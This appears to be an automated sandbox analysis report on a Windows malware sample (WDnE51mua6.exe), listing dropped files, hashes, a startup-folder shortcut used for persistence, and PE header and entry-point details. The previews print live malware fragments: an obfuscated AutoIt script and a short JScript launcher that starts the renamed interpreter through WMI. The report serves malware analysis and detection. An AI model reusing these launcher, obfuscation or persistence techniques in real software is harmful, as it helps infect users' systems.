Size (bytes):	475136
Entropy (8bit):	6.849448907791375
Encrypted:	false
SSDEEP:	12288:6tMaF5RxR/hezNwSiKeryu2fBpe+R7q5JmlG:8lmfipyu22WcmlG
MD5:	BBB6A426B60C6A2F63EF024B760E841A
SHA1:	BE39F0CFF6250813D9E7A2E8704C4CA2857D76B8
SHA-256:	ED609C4EBA6C25D93CDBF722385BC3548F3D6DCCAAFF6A0FA41FF00A7ADC4769
SHA-512:	BC9BF96B3B908AC5284CFEE7755728E631EBE61AC5CE637FC392F1916D345A1677E6CB0FB7139905553FDFAE33C05B8A351C6B6CFDB9BF6334AEDEE78C93BBAE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chrCF8.tmp Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.436260027531528
Encrypted:	false
SSDEEP:	3:73KRjyM1KW28OLa1:73uj1a8Oe1
MD5:	B29BF38565243D324A1E41E6046BB066
SHA1:	E7D4C557CB8FB5B00C94CA7F8E3ADD6060F087FA
SHA-256:	4B6F66EFB4919A346C9BDB937423F2D808C9EDB56ADE794D8FA4A9B45D7FEFF2
SHA-512:	82B067B479BC4C5AC440027D325DBB9E5DC59CF3EA417D07782D09EE7C9AA1600656652A1B4C5F9CFBD65575C6E66884EEE73A1675AC50215DD86360F7F0B1A4
Malicious:	false
Preview:	..Microsoft Windows [Version 10.0.17134.1]..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url Download File
Process:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js>), Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	178
Entropy (8bit):	3.632033496124056
Encrypted:	false
SSDEEP:	3:Q+2lRQuRkiglZlo14tGjLlAdVdhOEjl3QlMIolCl7nel1WGjXFQLlPK:Q+2lJglZyKhXUEZglJPZ6cGjX+w
MD5:	53B7CB2641E4A572F1355EA8002117E9
SHA1:	7195D9973A7E8F1573207DF7C241132DDE6672DC
SHA-256:	7E09B82661650D0A9BA4BE0AE17D48969486F0468B28E587560547FC82BCB3E9
SHA-512:	1B57BAF767B330C3BBC6DF4A51B3BA670F4B115B76216C32DD8A10B3792FB10E653FC55766CEF21C5DDF5738EB3972513351D1C1CB96516BC825E09913B089DB
Malicious:	true
Preview:	..[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].....U.R.L.=.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.z.P.g.F.q.F.U.s.M.L.\.w.A.Y.Z.q.H.g.Y.E.O.d.c.Y.U...j.s.".

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Che.vsd Download File
Process:	C:\Users\user\Desktop\WDnE51mua6.exe
File Type:	data
Category:	dropped
Size (bytes):	943908
Entropy (8bit):	6.625720682723327
Encrypted:	false
SSDEEP:	24576:/Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:/C7hGOSPT/PxebaiO
MD5:	A7DDD4D4067D7E404D579AE32DC91542
SHA1:	4203587509050293E0D1C8F833545230BB3355B0
SHA-256:	548E87E6B13CDDA866CCC0A125B4EEAB7879C2AE0FCAC20073AC953D2F682729
SHA-512:	1801871BFEC0C7BEB62B37B4BDAEE8733B9204594E4481647EFC476B819C8BE06FD1F2E88D99F8C62CA9C86BF91F2270C5C01E0950C160364F3F78171208B1F9
Malicious:	false
Preview:	nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B....................................................................................................................................................

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\D Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	981247
Entropy (8bit):	5.794859181755685
Encrypted:	false
SSDEEP:	12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
MD5:	870E342CA1600B86242061A18E7819E8
SHA1:	D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
SHA-256:	4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
SHA-512:	3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
Malicious:	false
Preview:	$DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com Download File
Process:	C:\Windows\SysWOW64\findstr.exe
File Type:	Targa image data - Mono 65536 x 184 x 0 +65535 ""
Category:	modified
Size (bytes):	943782
Entropy (8bit):	6.625457835020965
Encrypted:	false
SSDEEP:	24576:IJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:IC7hGOSPT/PxebaiO
MD5:	DAB8F26DB6E8D76655D96B463513CE6A
SHA1:	EA9C3631F94233C06750776CD9BD18E27FBD8677
SHA-256:	549D70CF61A50E8970E274BF7E76F4C9FAB1E185189A8AD074E2A5BDEA39005B
SHA-512:	E406093EB802A5EDBDC0E5F0A849D7F58F10DDED413DB9B6E0A4788125BA73C5B90F5D42A5D98AC68BA2E1FC01879C1403F32CFB3D8E5C26231C58E9751C2093
Malicious:	true
Preview:	......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B..................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Lineamento.vsd Download File
Process:	C:\Users\user\Desktop\WDnE51mua6.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	981247
Entropy (8bit):	5.794859181755685
Encrypted:	false
SSDEEP:	12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
MD5:	870E342CA1600B86242061A18E7819E8
SHA1:	D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
SHA-256:	4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
SHA-512:	3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
Malicious:	false
Preview:	$DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Poi.vsd Download File
Process:	C:\Users\user\Desktop\WDnE51mua6.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	119603
Entropy (8bit):	5.771907667395008
Encrypted:	false
SSDEEP:	3072:DXE3yUMc+GICKE3zGnF8potFOFDgXZ4S0qc2Tl:jBciCKEkKpSOF0poqc2Tl
MD5:	F96668D6E644D2D131C7C1B0E3465733
SHA1:	AF552D39A5ABD94E61CBC5CB18B0A35A9039573A
SHA-256:	EFFD096DF32E053A1926A58330D7AF2A369AD630B0ECC69C162473140773D67E
SHA-512:	61C2161EAFCDB928EF1652712333B087E1D2C2C154B619E24BE5ACED6F5E12B3D9E6D11E7774D3DE23FE2BDD231D1193157DCAC30C392843198EFCE4106982E4
Malicious:	false
Preview:	gsbekfEpcPdLxwEGOzyfkLWYOpNQeLgmykCGtyKlKlWHdYoxwfppjYdCcmgeCOiJBQ=onXBJJVFwPgHPqzONBthiUqlFRIHVrjyAzZVrOAAdafNuRnwpqxovDnhnNWRqgJXCouvwbKYqEWOFjrNaGbVJtJXUMvdSJmeIalXLeqMfciSGKIkJomxQOgnmpBfqxustTyheuedGLGgWQdlrkHJlykU..LnBALLUgQOMFcpDupNyoqCISskPNbiYIlpdHAPVZLZyeDFIwtDws=MrpPIpmWiRJPtxkTVFzSybqvGfLCNITuHBnyiSRFcrDovhnkbooYHnqfrMpzbXomXDiDVuLrNNbeTRqzQAyFmVnoBpwxIn..bUtlSyVfdvylTwXckLQDWSCZetZwMtsxfFZiPHihUkOpxKFiDOQISU=FayoOuUDjyLVheQGEECILrzFsmRbYgIBxxzPJnziqICtIPstNiktdkACYARggvFXblATIqWukcIeBfWCoNKQeDloTRQpHtSErEGngbcMky..VDbwJDguBLOVTZsqRpMnuCtZWIbgKsXFWKfFcQiGaXsSgJNmWbEDnGMamntwyqvlNpYoJMEweuu=kkLhUYsjNxudYXuXLuAsButyKEPpTCAaADuhNRuiJpvzeIlMGGfWFPHtiFCdoizlUOPcQTlUqaIaJLeexrDjjEMKVeyigQZBPjng..OWMvcWhufxcDAVtDuXdwymNNrFpzuCbjOpGiQQRHmEGHJEOUUXIgohNgoZaPMUZMXpPdfXNduIB=TurmRfnpTorAvsYRbeVFETKAObFWlaoALjcwWTXbcQTOugUXZVSrMWWZcCKzJCZBqCPpVWUEtnpNqWxADHXgmtOOdcGzpENTRsODnLwewgZhMoZmopQwEKwVOqTAdBcALdWIoReRGUhkyA..ivukZNMgudSObRBMmTmCvjdssiYcKbPQgYMrldcNYwQafeEqtoN=FXFVuOUSOdDIBeAmy

C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Veduto.vsd Download File
Process:	C:\Users\user\Desktop\WDnE51mua6.exe
File Type:	data
Category:	dropped
Size (bytes):	339968
Entropy (8bit):	7.999506483828205
Encrypted:	true
SSDEEP:	6144:9Y1gdVDxnSxQBbHnCXQGRW5XYyM+8Rfc34BuH7FKaKW53vya5XU1:9NvDxnSIqQsmYyN/oBm7FKtw3M1
MD5:	B4B043FBDA464D018EF01CEA7CEE7303
SHA1:	2B21F85669E9EE021A0805A1D802760993F86957
SHA-256:	63BC2CA795DA615CDFE6A0DCD3D65944632FE0013D452CAFC3016165A762BF2A
SHA-512:	BF6AF2FA5A1FD5D22C5F142C86FB167D9C849F3A294464375920EEA19CB1DD5068628C846B63B364E00BC1504EDDEF32FB6BBE1C1BEF7131248F8E291223A29E
Malicious:	false
Preview:	.<.8.~...j....Q..-..'._;n{..c..OO..P.8=[[p.....G.~..^."..2m.....2uJ.....3.qs. ...'...a.....U~.(W..^......p.H....D4_h~m$@p=.i.=..F..gh..=.........:.X.S2:p..L1S..x....3......"...sWZtT.Qr."P4.......d.........o...B.s...........)[.............J..Z.$...%{....g..o.:(....)o.Su=hn....i.x.....)..O.AWC..MAP.bIQ.{:....Xv3...C...[Q..0.....H2....1.;a.8m..J......'....!w..........u......(.?...@....A.l......E..^..]...... AL.H.......Z.4...m~..A.c^.......3._Y_......O....%W[..A.!.......e.k..[4....".5m6...1 l..\|...$..m....y..p.r.T....f....T.......S.nH......l...S...J..j...,P>hl..2.-....=.....IV.e.`._.h....P...\.....".....3......9..:e..`..6.B..g.eS\|x..<...KB.a#'......u..........A...\|.x... .....z#..>....#..f.......8J.....r.~.5.s........@....../..V..h\|..V..gs0.\...t.2f.N...n..P8.<#.....fn..Y..iK.....[yI ...F........k.xan......S.Y(vc..%...S.q.F...y...(o...`&....S.M...X..]...f.=...f............<.A?...#@.j..H.....].'..R.......H.>V .%q...:.iu9....../1.......

C:\Users\user\AppData\Roaming\zPgFqFUsML\I Download File
Process:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	981247
Entropy (8bit):	5.794859181755685
Encrypted:	false
SSDEEP:	12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
MD5:	870E342CA1600B86242061A18E7819E8
SHA1:	D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
SHA-256:	4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
SHA-512:	3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
Malicious:	false
Preview:	$DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut

C:\Users\user\AppData\Roaming\zPgFqFUsML\Veduto.vsd Download File
Process:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
File Type:	data
Category:	dropped
Size (bytes):	339968
Entropy (8bit):	7.999506483828205
Encrypted:	true
SSDEEP:	6144:9Y1gdVDxnSxQBbHnCXQGRW5XYyM+8Rfc34BuH7FKaKW53vya5XU1:9NvDxnSIqQsmYyN/oBm7FKtw3M1
MD5:	B4B043FBDA464D018EF01CEA7CEE7303
SHA1:	2B21F85669E9EE021A0805A1D802760993F86957
SHA-256:	63BC2CA795DA615CDFE6A0DCD3D65944632FE0013D452CAFC3016165A762BF2A
SHA-512:	BF6AF2FA5A1FD5D22C5F142C86FB167D9C849F3A294464375920EEA19CB1DD5068628C846B63B364E00BC1504EDDEF32FB6BBE1C1BEF7131248F8E291223A29E
Malicious:	false
Preview:	.<.8.~...j....Q..-..'._;n{..c..OO..P.8=[[p.....G.~..^."..2m.....2uJ.....3.qs. ...'...a.....U~.(W..^......p.H....D4_h~m$@p=.i.=..F..gh..=.........:.X.S2:p..L1S..x....3......"...sWZtT.Qr."P4.......d.........o...B.s...........)[.............J..Z.$...%{....g..o.:(....)o.Su=hn....i.x.....)..O.AWC..MAP.bIQ.{:....Xv3...C...[Q..0.....H2....1.;a.8m..J......'....!w..........u......(.?...@....A.l......E..^..]...... AL.H.......Z.4...m~..A.c^.......3._Y_......O....%W[..A.!.......e.k..[4....".5m6...1 l..\|...$..m....y..p.r.T....f....T.......S.nH......l...S...J..j...,P>hl..2.-....=.....IV.e.`._.h....P...\.....".....3......9..:e..`..6.B..g.eS\|x..<...KB.a#'......u..........A...\|.x... .....z#..>....#..f.......8J.....r.~.5.s........@....../..V..h\|..V..gs0.\...t.2f.N...n..P8.<#.....fn..Y..iK.....[yI ...F........k.xan......S.Y(vc..%...S.q.F...y...(o...`&....S.M...X..]...f.=...f............<.A?...#@.j..H.....].'..R.......H.>V .%q...:.iu9....../1.......

C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com Download File
Process:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: yPkfbflyoh.exe, Detection: malicious, Browse Filename: JYDy1dAHdW.exe, Detection: malicious, Browse Filename: EppTbowa74.exe, Detection: malicious, Browse Filename: tcNbszVulx.exe, Detection: malicious, Browse Filename: USHrlfZEJC.exe, Detection: malicious, Browse Filename: mcRrjT7JMX.exe, Detection: malicious, Browse Filename: 3MWIYkDesa.exe, Detection: malicious, Browse Filename: 3MWIYkDesa.exe, Detection: malicious, Browse Filename: MmuRNUcd2B.exe, Detection: malicious, Browse Filename: 23j6ZPLfOh.exe, Detection: malicious, Browse Filename: 23j6ZPLfOh.exe, Detection: malicious, Browse Filename: tl2uliYxhr.exe, Detection: malicious, Browse Filename: xARcpdYdew.exe, Detection: malicious, Browse Filename: vtg3HBN11U.exe, Detection: malicious, Browse Filename: 01FRraMfKS.exe, Detection: malicious, Browse Filename: PzmkDJz80S.exe, Detection: malicious, Browse Filename: dq1pzC7LNO.exe, Detection: malicious, Browse Filename: atikmdag-patcher 1.4.7.exe, Detection: malicious, Browse Filename: hfix.exe, Detection: malicious, Browse Filename: atikmdag-patcher 1.4.8.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js Download File
Process:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	284
Entropy (8bit):	4.908017768163253
Encrypted:	false
SSDEEP:	6:5AKIH8CYM2h2sUS4tRZDeLPqJI5FkPr2wNeLPqJI5Fka9FWDeLPqJI5Fk4p:5zS6R4t7Yw2wauY1
MD5:	893005367A38C097BD1AC6910453EAEB
SHA1:	964EB1DAC2C6333E71853DE5DDE9017E4500A2EA
SHA-256:	E973A295696760D5CFCAAC0C713D0DB9B1D7493F243E62C4C58AEFCA8A0603D6
SHA-512:	49B8C9F0DEB2ACC329FB7FD364F47E3D33F70BE995B7F5977FB8632D7197E0EFDA85F92813F87E9470F0DF972E473170A54490A5F988584939F1CB8C3D01CFC3
Malicious:	false
Preview:	GetObject("win" + "mgmts:\\\\.\\ro" + "ot\\ci" + "mv2:W" + "in32_Pr" + "oce" + "ss").Create("C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML\\juROhmfLml.exe.com C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML\\I" , "C:\\Users\\user\\AppData\\Roaming\\zPgFqFUsML", null, null )

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	386
Entropy (8bit):	5.152841278494102
Encrypted:	false
SSDEEP:	12:xYV1JWrVVlNL4986lO86limAgVa2+fX6lmM86ln:xYDMlZv6lO86lim3Va2+X6lmd6ln
MD5:	ED81F3E8939C9C235EE1A69A43B4FD52
SHA1:	3348810A5493D6DB80F8B9B836F301C51CE0CA24
SHA-256:	B6BDE1A044508592FAEEC125209BAAA4D9DB992F0DE6C0FB49D938D801A389B4
SHA-512:	8B3709ED3720E79C04407669C69D05744EED79C366FB8918D448B80AF88EBA5F4B1AB325ADA0CA5E865544748028F12F173999787B1E9912E1E10A7719BA109A
Malicious:	false
Preview:	Cabinet Maker - Lossless Data Compression Tool.... 0.00% - raw=0 compressed=0..100.00% - raw=5,857 compressed=1,811.. 0.00% [flushing current folder]. 94.32% [flushing current folder].** 4624a8e10d6df3306e1dd46223b6b1968208dd49 placed in cabinet C:\Users\user\AppData\Local\Temp\chr2302.tmp(3211362) on disk .. 3.04% [flushing current folder].100.00% [flushing current folder].

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Entropy (8bit):	7.948950858150679
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WDnE51mua6.exe
File size:	1338284
MD5:	7e7012645cc3d6d3572bb01891fbcec1
SHA1:	712fe21354098f3764f6e9cbe7b57dc67a65c478
SHA256:	df116f3585f1fe4b00c351a2941f6b85565e1fcc6da5569c6f7c80ddd1b4e2a8
SHA512:	8197fa8afd6ebfa016bb6ed1f81402f3520289343b98da1131cef927fe5ce8828ac6c8d95e34a6f198421285872ec556ad08ad2d2109e6244efa1d08e5cc51ca
SSDEEP:	24576:453uhFDHfQS65sxmN8CaEDtRcQv6sQVoRdJXUZCiF0YqlX7xpMyNIeFKtc8GCcm:45+hFDHOoGDvcC7UnF079pjOeYt3cm
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...JD.W.....................4......_.............@.......................... ......:................................................p.....................

File Icon


Icon Hash:	1d6dec6c6cf870fc

Static PE Info

General
Entrypoint:	0x41c35f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5700444A [Sat Apr 2 22:14:34 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a1a66d588dcf1394354ebf6ec400c223

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041FA80h
push 0041C4F0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041D1ECh]
pop ecx
or dword ptr [00426C88h], FFFFFFFFh
or dword ptr [00426C8Ch], FFFFFFFFh
call dword ptr [0041D1F0h]
mov ecx, dword ptr [00424C74h]
mov dword ptr [eax], ecx
call dword ptr [0041D1F4h]
mov ecx, dword ptr [00424C70h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041D1F8h]
mov eax, dword ptr [eax]
mov dword ptr [00426C84h], eax
call 00007F345CA1B822h
cmp dword ptr [004226F0h], ebx
jne 00007F345CA1B70Eh
push 0041C4E8h
call dword ptr [0041D1FCh]
pop ecx
call 00007F345CA1B7F4h
push 00422080h
push 0042207Ch
call 00007F345CA1B7DFh
mov eax, dword ptr [00424C6Ch]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00424C68h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041D204h]
push 00422078h
push 00422000h
call 00007F345CA1B7ACh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1feac	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27000	0xa3c5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d000	0x390	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
